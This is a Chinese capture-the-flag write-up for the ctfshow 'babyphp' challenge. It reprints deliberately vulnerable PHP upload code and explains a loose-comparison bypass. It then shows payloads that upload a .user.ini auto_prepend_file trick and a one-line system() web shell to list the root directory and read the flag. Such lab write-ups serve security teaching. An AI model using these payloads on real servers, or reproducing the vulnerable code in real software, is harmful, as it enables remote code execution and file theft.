
CTFSHOW-日刷-[baby杯]babyphp/弱类型比较

作者:互联网

代码审计

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-05-31 13:40:37
# @Last Modified by:   h1xa
# @Last Modified time: 2021-05-31 16:36:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// Hides every notice and warning for the whole request (e.g. the undefined
// $content in the 'download' branch below, or open_basedir warnings), so
// nothing that goes wrong in fileUtil is visible in the response.
error_reporting(0);

class fileUtil
{
    // Path written/read by this instance; arrives verbatim from the caller,
    // no normalisation (basename, traversal check) happens anywhere here.
    private $name;
    // Bytes written by file_upload(); unused by file_download().
    private $content;

    public function __construct($name, $content = '')
    {
        $this->name    = $name;
        $this->content = $content;
        // Confines this request's file operations to the web root; this is a
        // process-level fence, not a validation of $name itself.
        ini_set('open_basedir', '/var/www/html');
    }

    /**
     * Writes $content to $name when neither one contains "php"
     * (case-insensitive). Returns file_put_contents' result on a write and
     * 0 when the filter rejects either value (no filesystem access then).
     */
    public function file_upload()
    {
        $passesFilter = $this->waf($this->name) && $this->waf($this->content);
        if (!$passesFilter) {
            return 0;
        }

        return file_put_contents($this->name, $this->content);
    }

    /**
     * The only filter: true when $input does NOT match /php/i. It is a plain
     * substring denylist -- it does not constrain extensions other than ones
     * containing "php", dotfiles, or directory components of a path.
     */
    private function waf($input)
    {
        return preg_match('/php/i', $input) ? false : true;
    }

    /**
     * Streams the file at $name to the client as an attachment. Returns false
     * when the file does not exist and nothing (null) after a successful send.
     * $name is placed unescaped inside the quoted filename= parameter, so a
     * double quote in it breaks the header value.
     */
    public function file_download()
    {
        if (!file_exists($this->name)) {
            return false;
        }

        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.$this->name.'"');
        header('Content-Transfer-Encoding: binary');
        // Raw contents, whatever the file is, limited only by open_basedir.
        echo file_get_contents($this->name);
    }

    public function __destruct()
    {
    }
}

// Request dispatch. `?:` tests truthiness, so a missing or empty `a` falls
// through to highlight_file(__FILE__), which echoes this source and (per the
// PHP docs) returns true -- $action is then a bool, not a string.
$action = $_GET['a']?$_GET['a']:highlight_file(__FILE__);

// Strict comparison: only the exact string 'upload' is refused here.
if($action==='upload'){
    die('Permission denied');
}

// switch compares with == (loose), unlike the === guard above, so the two
// checks disagree for a non-string $action (e.g. the bool from the default).
switch ($action) {
    case 'upload':
        // $name and $content go to fileUtil unchanged; the only filter
        // applied to them is fileUtil::waf (a case-insensitive "php" match).
        $name = $_POST['name'];
        $content = $_POST['content'];
        $ft = new fileUtil($name,$content);
        if($ft->file_upload()){
            echo $name.' upload success!';
        }
        break;
    case 'download':
        $name = $_POST['name'];
        // $content is never assigned in this branch (undefined-variable
        // notice, hidden by error_reporting(0) above); the default '' is lost.
        $ft = new fileUtil($name,$content);
        if($ft->file_download()===False){
            echo $name.' download failed';
        }
        break;
    default:
        echo 'baby come on';
        break;
}

很明显，file_download 是一个文件读取点（直接 file_get_contents($this->name) 并输出）

 

 但是要想办法进入 switch 的 upload 分支

 

 难点在于：既要 $action 不等于 'upload'（过掉前面 === 的检查），又要让 switch 进入 case 'upload'

这里查了一下：switch 用的是弱类型比较（==），而在弱类型比较下，非空字符串和布尔值 true 相比结果为 true，可看下图

 而看这句话

$action = $_GET['a']?$_GET['a']:highlight_file(__FILE__);

有 GET 传入的 a，那么 $action 就是 a 的值；否则 $action 等于 highlight_file(__FILE__) 的返回值，而该函数成功时返回 true（源码被直接输出到页面）

 

 

 

 

 因此不用传入 a 参数：$action 默认为 true，=== 'upload' 不成立，但在 switch 的 == 比较下与 'upload' 相等，于是进入 upload 分支（这也就是为什么开始没传参时，没有显示 baby come on）

这里还有个 waf（只检查 name 和 content 里是否含有 php，不分大小写），content 里直接用 <?= 即可绕过。但文件名没法改成 .php 结尾（同样会被拦下），这里可以上传 .user.ini

 先传入.user.ini (name=.user.ini&content=auto_prepend_file=1.jpg)

 

 

 再传入shell (name=1.jpg&content=<?=system('ls /');?>)

 

读flag(name=1.jpg&content=<?= system('cat /flag_baby_here_you_are');?>)

 

 

 

 

来源: https://www.cnblogs.com/aninock/p/15378270.html